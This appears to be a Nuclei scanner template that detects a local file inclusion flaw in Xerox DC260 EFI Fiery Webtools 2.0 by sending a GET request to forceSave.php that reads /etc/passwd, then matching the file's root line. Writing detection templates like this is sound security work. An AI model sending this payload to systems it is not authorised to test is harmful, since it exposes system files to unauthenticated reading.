id: xerox-efi-lfi info: name: Xerox DC260 EFI Fiery Controller Webtools 2.0 - Local File Inclusion author: gy741 severity: high description: Xerox DC260 EFI Fiery Controller Webtools 2.0 is vulnerable to local file inclusion because input passed thru the 'file' GET parameter in 'forceSave.php' script is not properly sanitized before being used to read files. This can be exploited by an unauthenticated attacker to read arbitrary files on the affected system. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php - https://packetstormsecurity.com/files/145570 - https://www.exploit-db.com/exploits/43398/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 metadata: max-request: 1 tags: iot,xerox,disclosure,lfi,packetstorm,edb http: - method: GET path: - "{{BaseURL}}/wt3/forceSave.php?file=/etc/passwd" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100df516cfc896ae17928cb064dce74ddfa3a9dfb9926355ce2bb55e2fd85b50902022001ce6d105bae175ffeaba26a8a9cd7c9689319d982b17031ea2d7914771fa77d:922c64590222798bb761d5b6d8e72950